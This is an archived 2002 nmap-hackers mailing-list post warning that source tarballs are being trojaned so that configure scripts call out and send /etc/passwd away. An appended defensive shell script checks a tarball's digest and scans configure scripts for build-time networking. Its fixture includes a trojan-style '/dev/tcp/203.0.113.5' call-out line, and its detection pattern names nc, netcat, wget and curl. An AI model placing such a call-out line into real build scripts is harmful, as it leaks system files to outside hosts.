From: Philip Ehrens (pehrens_at_ligo.caltech.edu)
Date: Wed Nov 13 2002 - 14:46:16 CST

    I would like to point out that the type of trojan described below
    is becoming increasingly common. ftp.sendmail.org was compromised
    recently and a similar trojan was placed in the sendmail source
    tarball.

    I know of at least 12 common packages that have had their source
    tarballs compromised within the last 3 months on servers that were
    considered secure. The folks doing this have gone as far as to
    hijack DNS and root machines on specific subnets in order to place
    this type of trojan.

    These trojans are activated during the build process of the source
    tarball in most cases, usually the configure script contains some
    variation of code that establishes a connection to a remote machine.

    I believe that the folks doing this are actually trying to catch
    certain specific machines or subnets, and are not doing this to
    set up DDOS or just to own large numbers of boxes. When I activated
    one of these trojans while building a package all that happened was
    that my /etc/passwd file was shipped off. The machine listening on
    the other end never did anything except stay connected for a while.

    I expect to see more and more of this at an accelerating rate
    from now on... if you are letting root make remote connections
    you are asking for trouble!

    Sorry for using your list for this, Fyodor. I won't do it again.

    Phil

    Fyodor wrote:
    > I just wanted to send out a quick note that the version of libpcap
    > shipped with Nmap does NOT contain the trojan described at:
    >
    > http://hlug.fscker.com/
    > http://slashdot.org/article.pl?sid=02/11/13/1255243&mode=nested&tid=172&threshold=3
    >
    > Cheers,
    > -F
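
    The two pre-build checks a defender would want after reading the above,
    as an added example that is not part of Phil's post or of the Nmap project:
    pin the tarball to a SHA-256 digest obtained out of band, and refuse to run
    a configure script that contains shell-level networking. The digest,
    file names and the 203.0.113.5 address are constructed fixtures, and the
    indicator list is a heuristic, not a proof of absence.

```shell
#!/bin/sh
# Added example, not code from the original post or from Nmap.
# Two checks to run on a downloaded source tarball before "./configure":
#   verify_digest FILE EXPECTED_SHA256   exit 0 iff FILE hashes to EXPECTED_SHA256
#   scan_for_network_calls FILE          exit 0 iff FILE contains no build-time
#                                        network indicators (prints hits otherwise)
# All digests, file names and addresses below are constructed fixtures
# (203.0.113.0/24 is an RFC 5737 documentation range).

sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# Compare the tarball against a digest obtained out of band (a signed
# announcement, a second mirror, an earlier download), never one fetched
# from the same server that served the tarball.
verify_digest() {
    _actual=$(sha256_of "$1")
    [ "$_actual" = "$2" ]
}

# Shell-level networking that has no business in configure or a Makefile.
# Deliberately omits "socket(" / "connect(": autoconf probes such as
# AC_CHECK_FUNCS legitimately emit "char socket ();" into conftest programs.
NET_INDICATORS='/dev/(tcp|udp)/|(^|[^[:alnum:]_])(nc|netcat|telnet|ftp|wget|curl)[[:space:]]'

scan_for_network_calls() {
    if grep -E -n "$NET_INDICATORS" "$1"; then
        return 1      # indicators found: do not build
    fi
    return 0
}

# Constructed fixtures: an innocuous configure fragment, one carrying the
# kind of call-out Phil describes, and a stand-in "tarball" whose SHA-256
# is the well-known digest of "hello\n".
write_fixtures() {
    cat >"$1/configure.clean" <<'EOF'
#! /bin/sh
ac_default_prefix=/usr/local
char socket ();
EOF
    cat >"$1/configure.trojaned" <<'EOF'
#! /bin/sh
ac_default_prefix=/usr/local
exec 3<>/dev/tcp/203.0.113.5/6667
EOF
    printf 'hello\n' >"$1/pkg.tar.gz"
}

# Stand-alone demo: prints the verdict for each fixture.
demo() {
    d=$(mktemp -d)
    write_fixtures "$d"
    if verify_digest "$d/pkg.tar.gz" 5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03; then
        echo "pkg.tar.gz: digest ok"
    else
        echo "pkg.tar.gz: DIGEST MISMATCH"
    fi
    for f in "$d/configure.clean" "$d/configure.trojaned"; do
        if scan_for_network_calls "$f" >/dev/null; then
            echo "$f: clean"
        else
            echo "$f: REFUSE TO BUILD"
        fi
    done
    rm -rf "$d"
}
demo
```

    The digest check is the one that actually addresses a replaced tarball;
    the grep is a cheap second line for the case Phil describes, where the
    payload lives in the generated configure script rather than in the
    compiled program, and a quick read of the hits tells you whether to
    build at all.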

    --------------------------------------------------
    For help using this (nmap-hackers) mailing list, send a blank email to
    nmap-hackers-help@insecure.org . List run by ezmlm-idx (www.ezmlm.org).